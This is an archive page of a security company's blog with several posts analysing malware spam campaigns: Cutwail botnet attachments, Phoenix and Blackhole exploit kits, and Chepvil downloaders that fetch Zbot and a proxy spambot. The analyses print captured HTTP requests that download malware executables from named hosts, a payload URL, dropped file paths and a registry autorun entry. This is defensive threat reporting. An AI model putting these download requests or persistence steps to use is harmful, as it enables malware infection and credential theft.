Malicious Spam « M86 Security Labs Blog

Posts Tagged ‘Malicious Spam’

Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez • February 16th, 2012 • Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, fortunately its default settings prevented the malicious JavaScript in the HTML source code from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example of a more recent spam campaign. This particular message claims to be an invoice from a random company where an .HTM file is attached pretending to be an invoice file. Here, the sample spam was opened using Microsoft Outlook and the attachment just shows the icon of the default browser of the system. Again, in order for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.

So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugin. In our test machine, the landing page successfully exploited our browser’s default PDF reader with the Libtiff integer overflow in Adobe Reader vulnerability. The exploit ended up downloading and installing malware in our test computer, which at the time of writing, was a data-stealing Trojan with the antivirus detection name Cridex.

The landing page that contains the exploit code is a kit used by cybercriminals particularly for this spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use, all they need is their own webserver that can run PHP server scripts. The image shown below is the screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—“ referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.

Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.

Tags: Cutwail | Exploit Kits | Malicious Spam | Malware

An analysis of the ACH spam campaign

By Rodel Mendrez • September 6th, 2011 • Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

The malware code that attempts to connect to the control server

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Want to be friends on Facebook? Don’t click the link!

By Phil Hay • August 29th, 2011 • Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

By contrast, here is a legitimate Facebook friend request.

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

Malicious Spam on the increase again

By Rodel Mendrez • April 29th, 2011 • Spam

Malware distribution via email is far from dead. While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again

Your Music Order – a loaded PDF

By Phil Hay • March 31st, 2011 • Spam

We are noticing a spam campaign at the moment that purports to be a Music or Cell Phone “Order” with an attached PDF file with the following similar Subject lines:

Your Order No 129589 – Warner Music Inc.
Your Order No 489889 – Cell Phone Inc.

The attached PDF contains a bunch of obfuscated JavaScript, which attempts to exploit the Adobe getIcon vulnerability (CVE-2009-0927). If successful, the following payload is downloaded:

hxxp://kawabungashop.ru/flash/1.php

The 1.php file is an executable downloader (VirusTotal Report). Another piece of malware is then downloaded and installed (VirusTotal Report), which is a spambot that proceeds to spam further copies of the PDF file, as you can see from the template we captured:

These days, PDF files arriving in unexpected emails should be treated with extreme suspicion. And please be sure to keep your PDF reader meticulously up to date to avoid getting exploited by old vulnerabilities such as this.

Malicious Spam Campaign Preys on Japanese Disaster

By Phil Hay • March 17th, 2011 • Spam

There is a large-scale malicious spam campaign going on currently. The spam comes in a few different types, one of which imitates a Twitter notification. The subjects of the spam varies, but sadly, many focus on the recent events in Japan.

The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string

The links lead to a page hosting obfuscated malicious JavaScript, which seek to exploit a Java vulnerability. Our host was immediately compromised, botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed complete with scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers. As ever, remain on guard, especially when it comes to Twitter ‘notifications’.

Tags: Current Events | Cutwail | Japan | Malicious Spam | Twitter

UPS Spam.. Oh Wait, It’s an FDIC Spam Campaign

By Rodel Mendrez • February 15th, 2011 • Spam

After more than a week of malicious UPS spam campaigns, the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the Federal Deposit Insurance Corporation or FDIC claiming to notify users of important changes in FDIC regulations, hence a “document” is attached for further reading. However, the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com.

And even worse, yesterday it left the Subject line as “United Parcel Service notification #<6 digits>“. Fail!

FDIC spam campaign with Subject line and From field pertaining to UPS.

The ZIP attachment contains malware which aims to steal online banking credentials, the same payload as the last week’s UPS spam campaign.

Decompressing the ZIP file exposes an executable Trojan file bearing an Adobe PDF icon

This spam campaign contains enough weird errors for users to take notice that the email is indeed suspicious. It may not last however, we expect this spammer will fix or come up with new (and recycled) spam campaigns as they try to distribute their malware.

Tags: Cutwail | FDIC | Malicious Spam | UPS

Spammed Malware Ramps Up Again

By Phil Hay • February 14th, 2011 • Spam

It was probably too good to last. The past few months has been blissfully quiet on the spam front, and in particular, spam with accompanying malware. The chart below shows an unusually quiet period during December and January.

However, over the last week, we have seen the return of two familiar-looking malware spam campaigns.

Post Express: Package Available
United Parcel Service: Notification

While these two campaigns have similar themes, the spam originates from different spambots and has quite different payloads.

PDF Exploit Disguised as a Xerox Scanned Document

By Rodel Mendrez • February 7th, 2011 • Spam

Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks however, have imitated email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner.